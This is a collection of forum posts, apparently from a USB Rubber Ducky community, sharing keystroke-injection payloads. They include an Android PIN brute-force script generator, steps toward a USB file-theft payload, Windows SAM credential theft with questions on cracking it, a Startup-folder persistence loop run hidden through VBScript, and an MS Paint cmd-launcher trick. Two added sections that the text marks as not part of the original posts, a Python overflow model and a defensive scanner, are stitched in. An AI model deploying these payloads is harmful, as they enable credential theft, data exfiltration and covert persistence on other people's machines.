overwraith

Posts posted by overwraith

  1. I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

    C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

    C:\Users\UserName\Desktop>dir android*
    Volume in drive C has no label.
    Volume Serial Number is 2499-C7D7

    Directory of C:\Users\UserName\Desktop

    07/07/2012 01:03 AM 165 Android Paths.txt
    08/30/2012 08:00 PM 50 Android SDK Path.txt
    12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
    3 File(s) 278 bytes
    0 Dir(s) 831,818,436,608 bytes free

    C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
    DELAY 5000 ; echo {0000..9999}
    STRING
    DELAY 1000
    ENTER
    ENTER

    C:\Users\UserName\Desktop>

  2. I haven't had a chance to take a look at the firmware source code, or look into firmware creation, but I hope to as soon as I find some more time. I was just curious as to whether or not it is possible to create firmware that selects the type of keyboard for the duckey randomly, e.g. Dell keyboard, generic Logitech keyboard, etc.

    My reason for asking is that it is probably just a matter of time until someone figures out how to ban the keyboard type the duckey uses.

    I don't want to create any more work for the developers just yet, since I hear they are very busy. This is just some food for thought.

  3. What would be better is a Windows and/or Linux app that organizes payloads and does all the commands to upload to the SD card. No offence, but loading payloads the current way is just as cumbersome or worse than using a GUI (Arduino) and a Teensy. There is also an annoying bug where Java needs to be added to some setting inside DOS; having an app to fix common issues would be cool :-)

    I was looking into making an Android app where I could just select the payload from the development files on my SD card, but that quickly fell through when I couldn't find any RTF file support in Android. It would be cool if we (the community) could make an Android GUI/friendly compiler, because that would mean you could compile from your phone or tablet. Would mean mobile payload selection.

    YAY, someone mentioned my SAM payload improvement on the web show!!!

  4. I'm glad people think this is cool. I will look into using SamInside or the export to NTLM hashes, then Cain or a GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername%, and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back-to-back encrypted data, but if all SAM files are the same size, then it shouldn't be a problem, as we can always parse the data via command filters/flags, or separate it into other files later. Good points from everybody.

  5. Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?

    cmd.exe /V:ON
    Set /A usedSpace=0
    for /R %i in (*) do Set /A usedSpace+=%~zi

    Yields>

    C:\>Set /A usedSpace+=8635
    -1933490268
    C:\>Set /A usedSpace+=5379
    -1933484889
    C:\>Set /A usedSpace+=22368
    -1933462521
    C:\>Set /A usedSpace+=2048
    -1933460473
    C:\>Set /A usedSpace+=844
    -1933459629
    C:\>Set /A usedSpace+=4726
    -1933454903
    C:\>Set /A usedSpace+=5182
    -1933449721
    C:\>Set /A usedSpace+=153298
    -1933296423
    C:\>Set /A usedSpace+=31
    -1933296392
    C:\>Set /A usedSpace+=1142784
    -1932153608
    C:\>Set /A usedSpace+=1630208
    -1930523400
    C:\>Set /A usedSpace+=540672
    -1929982728
    C:\>
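
An added example, not part of the original post: cmd.exe's `set /A` evaluates in 32-bit signed integers, so a running byte total wraps negative once it passes 2,147,483,647. The Python below models that wraparound and replays the increments printed above; the helper names and the starting value (first printed total minus first increment) are assumptions.

```python
# Added example: models the 32-bit signed arithmetic of cmd.exe's `set /A`.
WRAP = 2**32

def to_int32(n):
    """Wrap n to 32-bit two's complement, the range `set /A` results live in."""
    return (n + 2**31) % WRAP - 2**31

def accumulate(sizes, start=0):
    """Replay `set /A total+=size`. Returns (wrapped running totals,
    true total, index of the first add whose result wrapped or None)."""
    wrapped = true_total = start
    totals, first_wrap = [], None
    for i, size in enumerate(sizes):
        true_total += size
        wrapped = to_int32(wrapped + size)
        if first_wrap is None and wrapped != true_total:
            first_wrap = i
        totals.append(wrapped)
    return totals, true_total, first_wrap

def min_true_total(wrapped):
    """Smallest non-negative byte count that wraps to this int32 value."""
    return wrapped % WRAP

# Increments and running totals exactly as printed in the post.
POST_SIZES = [8635, 5379, 22368, 2048, 844, 4726,
              5182, 153298, 31, 1142784, 1630208, 540672]
POST_TOTALS = [-1933490268, -1933484889, -1933462521, -1933460473,
               -1933459629, -1933454903, -1933449721, -1933296423,
               -1933296392, -1932153608, -1930523400, -1929982728]
# Assumption: accumulator value just before the first printed line,
# derived as first total minus first increment.
START = POST_TOTALS[0] - POST_SIZES[0]

if __name__ == "__main__":
    totals, _, _ = accumulate(POST_SIZES, START)
    print("replay matches post:", totals == POST_TOTALS)
    print("bytes summed before first line (at least):", min_true_total(START))
    # Constructed sizes that cross 2**31 - 1 on the third add.
    print(accumulate([2_000_000_000, 147_483_647, 1]))
```
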

  6. I am starting work on a Duckey USB file theft payload. The following code will execute directly in the command prompt, iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation), which will have a text file, evac.txt, on the root. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives and archive the files to your USB drive. The following is the code that will find the drives and save them to a variable so we can send their locations to the 7zip application as arguments.

    REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION
    REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT
    REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE
    cmd.exe /V:ON

    REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND
    REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST
    Set targetDr=*

    REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION
    REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE
    REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED
    REM EXPANSION WE SET EARLIER
    for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: )

    REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE
    REM LIST VARIABLE EARLIER
    Set targetDr=%targetDr:~1%

    REM SHOW ME THE OUTPUT
    echo %targetDr%

    The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough.

    If the "stealthiness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.

  7. The color matters because the subsequent duck versions are all different colors. Typically each time the hardware changes the duck changes colors. I think the order goes something like this: green=version1, red=version2, silver/white=version3, or something like that. The green ducks had a lock on the SD card that involved pulling out a lever to release the SD card; all subsequent versions are removable simply by pulling the SD card out the back (first time typically needs a pair of tweezers).

  8. The following is a prank script that runs a batch loop that kills processes that you specify. A key characteristic of this particular script is that it uses a vbs script to run the batch script silently. When I was making this script I was surprised to learn that newer OSes do not run batch scripts silently. I got the vbs script someplace else, but I don't remember where. I have seen this script online on several websites though. The naming convention of the files produced is intentionally ambiguous, ex. a.bat, b.vbs.

    CONTROL ESC
    DELAY 200
    STRING cmd
    ENTER
    REM A different directory in case the second one is inaccessible
    DELAY 1000
    STRING cd %userprofile%\Downloads\
    ENTER
    DELAY 1000
    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
    ENTER
    DELAY 100
    REM Delete batch file if already exists
    STRING erase /Q a.bat
    ENTER
    REM Make the batch file
    STRING copy con a.bat
    ENTER
    DELAY 100
    STRING @echo off
    ENTER
    STRING :Start
    ENTER
    STRING taskkill /f /im "iexplore.exe"
    ENTER
    STRING taskkill /f /im "firefox.exe"
    ENTER
    STRING taskkill /f /im "devenv.exe"
    ENTER
    STRING taskkill /f /im "pennote.exe"
    ENTER
    STRING timeout /t 30
    ENTER
    STRING Goto Start
    ENTER
    CONTROL Z
    ENTER
    DELAY 100
    REM Only way to run a batch file silently on vista/Win7
    REM Delete vbs file if already exists
    STRING erase /Q b.vbs
    ENTER
    STRING copy con b.vbs
    ENTER
    STRING Set WshShell = CreateObject("WScript.Shell")
    ENTER
    STRING WshShell.Run chr(34) & "a.bat" & Chr(34), 0
    ENTER
    STRING Set WshShell = Nothing
    CONTROL Z
    ENTER
    STRING b.vbs
    ENTER
    DELAY 100
    STRING EXIT
    ENTER
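
From the defender's side, the two files this payload leaves in a Startup folder have recognisable content: a VBScript whose `Run` call passes window style 0 (hidden), and a batch file that loops over `taskkill`. An added example, not part of the original post, that flags both in Python; the function name, the regex heuristics and the sample dictionary (constructed from the post's file contents plus one benign file) are assumptions.

```python
import re

# Added example: heuristics only, names are illustrative.
# WshShell.Run <command>, 0 -> window style 0 starts the command hidden.
HIDDEN_RUN = re.compile(r'\.Run[ \t]+(.+?),[ \t]*0[ \t]*(?:,|$)', re.I | re.M)
TASKKILL = re.compile(r'^[ \t]*taskkill\b.*?/im[ \t]+"?([^"\s]+)', re.I | re.M)
LABEL = re.compile(r'^[ \t]*:(\w+)', re.M)
GOTO = re.compile(r'^[ \t]*goto[ \t]+:?(\w+)', re.I | re.M)

def scan_startup(files):
    """files maps file name -> text. Returns sorted (name, finding) tuples."""
    findings = []
    for name, text in files.items():
        lower = name.lower()
        if lower.endswith((".vbs", ".vbe")):
            for m in HIDDEN_RUN.finditer(text):
                findings.append((name, "hidden-window Run: " + m.group(1).strip()))
        elif lower.endswith((".bat", ".cmd")):
            labels = {label.lower() for label in LABEL.findall(text)}
            loops = any(t.lower() in labels for t in GOTO.findall(text))
            killed = TASKKILL.findall(text)
            # A goto back to a label plus forced kills is the pattern of interest.
            if loops and killed:
                findings.append((name, "taskkill loop: " + ", ".join(killed)))
    return sorted(findings)

# Constructed sample: the two files the post's payload creates, plus a benign one.
SAMPLE = {
    "a.bat": '''@echo off
:Start
taskkill /f /im "iexplore.exe"
taskkill /f /im "firefox.exe"
timeout /t 30
Goto Start
''',
    "b.vbs": '''Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "a.bat" & Chr(34), 0
Set WshShell = Nothing
''',
    "notes.bat": "@echo off\necho nightly job finished\n",
}

if __name__ == "__main__":
    for name, finding in scan_startup(SAMPLE):
        print(f"{name}: {finding}")
```
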
    
  9. Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following:

    SAM --> SAM1
        --> SAM2
        --> SAM3
        --> SAM4

    So we can store multiple user SAMs without losing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAMs?

  10. If you add a removable flash drive and USB hub to the duckey SAM attack (take em with you in your pocket + use the hub to plug in simultaneously) and add the file evac.txt to the flash drive's root, you can replace the CD <Directory> command in the SAM payload with this command, which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we won't even need the hub and flash drive. I am still testing this, so an additional delay may need to be added after this command.


    STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )
    
  11. Here is a tweaked version that has a delete command so the duckscript can be run multiple times on computers without any problems.
    Tried to use the WRITELINE command to replace the STRING ENTER commands, but it looks like the delay command on the online compiler may not work for WRITELINE. Couldn't find a way to slow the commands down enough to prevent the script from messing up. Defaulted back to STRING ENTER commands.

    REM MOBILETABS.TXT BEGINS
    REM HIDE COMMAND WINDOW
    CONTROL ESCAPE
    STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    REM DELETE THE SCRIPT IF IT ALREADY EXISTS
    STRING DEL /Q MobileTabs.vbs
    ENTER
    REM VB SCRIPT FOUND AT:
    REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer
    REM INPUT FILE MobileTabs.vbs
    STRING copy con MobileTabs.vbs
    ENTER
    STRING on error resume next
    ENTER
    STRING navOpenInBackgroundTab = &h1000
    ENTER
    STRING set oIE = CreateObject("InternetExplorer.Application")
    ENTER
    STRING Set args = WScript.Arguments
    ENTER
    STRING oIE.Navigate2 args.Item(0)
    ENTER
    STRING for intx = 1 to args.count
    ENTER
    STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
    ENTER
    STRING next
    ENTER
    STRING oIE.Visible = true
    ENTER
    CONTROL Z
    ENTER
    REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE,
    REM AND SEND THE FILE TO THE VB SCRIPT
    REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
    STRING MobileTabs.vbs http://www.google.com/ http://mwomercs.com/ http://hak5.org/ http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/
    ENTER
     
  12. The following is some duck script I made for easily setting up the MS Paint hack from way back in episode 925. Machines secured correctly with group policies are not susceptible to this attack. You are still required to save the file correctly, and input the colors in the correct order, but they should already be in the correct order in the custom color box. This particular variant only works on Windows 7, but could be easily modified for Vista.

    REM MSPAINT hack revealed by "Operator"
    CONTROL ESCAPE
    DELAY 200
    STRING mspaint
    ENTER
    DELAY 1000
    CTRL E
    STRING 6
    TAB
    STRING 1
    ENTER
    CTRL PAGEUP
    REPEAT 5
    REM ****FIRST COLOR****
    ALT H
    STRING EC
    ALT R
    STRING 10
    TAB
    STRING 0
    TAB
    STRING 0
    ENTER
    REM ****SECOND COLOR****
    ALT H
    STRING EC
    ALT R
    STRING 13
    TAB
    STRING 10
    TAB
    STRING 13
    ENTER
    REM ****THIRD COLOR****
    ALT H
    STRING EC
    ALT R
    STRING 100
    TAB
    STRING 109
    TAB
    STRING 99
    ENTER
    REM ****FOURTH COLOR****
    ALT H
    STRING EC
    ALT R
    STRING 120
    TAB
    STRING 101
    TAB
    STRING 46
    ENTER
    REM ****FIFTH COLOR****
    ALT H
    STRING EC
    ALT R
    STRING 0
    TAB
    STRING 0
    TAB
    STRING 101
    ENTER
    REM ****SIXTH COLOR****
    ALT H
    STRING EC
    ALT R
    STRING 0
    TAB
    STRING 0
    TAB
    STRING 0
    ENTER
    
  13. Here is some duck script I made that:
    -Types in a VB Script that opens tabs in Internet Explorer
    -Runs the VB Script with the proper arguments that opens the desired webpages in Internet Explorer.

    Not exactly hacking, but could be useful to somebody.

    The VB Script was written by somebody else and the author's post can be found at:
    http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.html

    Made the duck script specifically so I could pick up and move permalinks from databases like EBSCOhost to other computers and quickly open them during the research stages of papers.

    REM MOBILETABS.TXT BEGINS
    REM HIDE COMMAND WINDOW
    CONTROL ESCAPE
    STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    REM VB SCRIPT FOUND AT:
    REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer
    REM INPUT FILE MobileTabs.vbs
    STRING copy con MobileTabs.vbs
    ENTER
    STRING on error resume next
    ENTER
    STRING navOpenInBackgroundTab = &h1000
    ENTER
    STRING set oIE = CreateObject("InternetExplorer.Application")
    ENTER
    STRING Set args = WScript.Arguments
    ENTER
    STRING oIE.Navigate2 args.Item(0)
    ENTER
    STRING for intx = 1 to args.count
    ENTER
    STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
    ENTER
    STRING next
    ENTER
    STRING oIE.Visible = true
    ENTER
    CONTROL Z
    ENTER
    REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE,
    REM AND SEND THE FILE TO THE VB SCRIPT
    REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
    STRING MobileTabs.vbs http://www.google.com/ http://mwomercs.com/ http://hak5.org/ http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/
    ENTER
    
  14. Kinda resurrecting a dead topic, but actually, mouse movement could add a lot of functionality to the USB Rubber Duckey. If you know the screen size of your target, and use something like the Logitech G13 and its internal Lua scripting to grab screen pixel values, and you full-screened some applications, you could use any buttons on the application with the Duckey regardless of whether they support key combos. On the same token, however, you could probably program the Logitech G13 to do pretty much anything the Duckey can anyway. I prefer the Duckey though, since it is a small and flash-drive-like poison pill.

  15. I have looked around for brute forcer code, and discovered that the number of combinations required for even 4 character passwords makes it impractical to implement a duckey brute forcer. The only way to possibly make this feasible would be to use something like CUPP, the common user password profiler, to generate a small password file, and then use a modified version of my duckscript converter or someone else's duckscript converter to turn the file to duckscript. Even then it still might prove impractical. Probably best to keep the duck running command line exploits and payloads etc.
